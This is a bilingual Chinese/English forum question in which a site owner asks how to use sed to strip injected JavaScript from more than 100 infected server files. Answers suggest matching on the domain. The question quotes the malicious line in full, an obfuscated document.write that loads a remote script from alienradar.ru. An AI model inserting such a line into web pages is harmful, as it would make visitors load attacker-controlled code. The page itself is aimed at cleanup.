如何从多个文件中删除恶意 Javascript 代码
最近我的 Linux 服务器感染了恶意软件,结果,我有 100 多个文件被一行 Javascript 代码感染:
document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');
我太累了,无法手动删除它,所以我深入谷歌(对 Linux 不太了解)那里有帮助)并发现我可以使用 sed 来达到此目的。
不幸的是,我无法转义该行,因此我可以使用
sed -i.bak '/line of text/d' *
语法,它充满了单引号、双引号和反斜杠。
我怎样才能转义字符串或者有其他更简单的方法来做到这一点?
Recently my linux server got infected with malware and as a result, I have 100+ files infected with a single line of Javascript code:
document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');
I would be too tiring to remove it manually, so I dig into google (not knowing much about linux did not help there) and found out that I can use sed for this purpose.
Unfortunately, I couldn't escape the line so I could use
sed -i.bak '/line of text/d' *
syntax, it's full of single quotes, double quotes and backslashes.
How could I escape the string or is there any other - easier - way of doing this?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(2)
您不能仅使用 sed 删除包含例如
alienradar.ru
或仅存在于攻击性行中的其他子字符串的任何行吗?像这样的东西:Could you not just use sed to delete any line containing, for example,
alienradar.ru
, or some other substring which only exists in the offensive lines ? Something like:http://www.configureweb .com/post/how-to-change-html-code-in-multiple-files-at-once 从服务器下载所有文件并重新上传后按照此操作
http://www.configureweb.com/post/how-to-change-html-code-in-multiple-files-at-once follow this after donwloading all files from server and reupload it